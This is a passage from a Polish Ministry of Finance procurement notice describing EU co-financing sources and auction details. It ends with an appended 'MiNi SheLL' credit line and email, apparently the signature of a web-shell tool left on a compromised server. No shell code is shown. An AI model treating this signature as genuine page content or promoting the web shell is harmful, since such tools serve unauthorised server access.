licytacji elektronicznych Urzędu Zamówień Publicznych, zakładka Ogłoszenie, pod adresem
http://licytacje.uzp.gov.pl zostanie podana nazwa(firma) oraz adres Wykonawcy, którego ofertę
wybrano; 12. Informacyjnie: czas pracy w Ministerstwie Finansów codziennie od poniedziałku do
piątku z wyłączeniem dni ustawowo wolnych od pracy, w godzinach 8:15-16:15; 13. Umowa będzie
finansowana ze środków budżetowych oraz w części współfinansowana przez Unię Europejską ze
środków: 1) Europejskiego Funduszu Rozwoju Regionalnego w ramach Projektu
POPT.02.02.00-00-322 13  Zakup sprzętu informatycznego na potrzeby Jednostki odpowiedzialnej za
weryfikację zasady dodatkowości w latach 2011-2013  Programu Operacyjnego Pomoc Techniczna
2007-2013, 2) Europejskiego Funduszu Rozwoju Regionalnego w ramach projektów w ramach 7 osi
priorytetowej  Społeczeństwo informacyjne - budowa elektronicznej administracji Programu
Operacyjnego Innowacyjna Gospodarka 2007-2013 zgodnie z Umową o dofinansowanie nr
POIG.07.01.00-00-028/10-00  e-Podatki z dnia 30.07.2010r. wraz z aneksem nr 5/KSI SIMIK
POIG.07.01.00-00-028/10-05 z dnia 03.06.2013 r.; Umową o dofinansowanie nr
POIG.07.01.00-00-026/09-00 ,,e-Deklaracje 2  z dnia 30.07.2010r. wraz z aneksem nr 5/KSI SIMIK
POIG.07.01.00-00-026/09-05 z dnia 03.06.2013 r..; Umową o dofinansowanie nr
POIG.07.01.00-00-028/09-00  e-Rejestracja  z dnia 30.07.2010r. wraz z aneksem nr 4 KSI SIMIK
POIG.07.01.00-00-028/09-04 z dnia 03.06.2013 r. 3) Europejskiego Funduszu Rozwoju Regionalnego
w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013, projekt nr POPT
.02.02.00-00-349 13.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com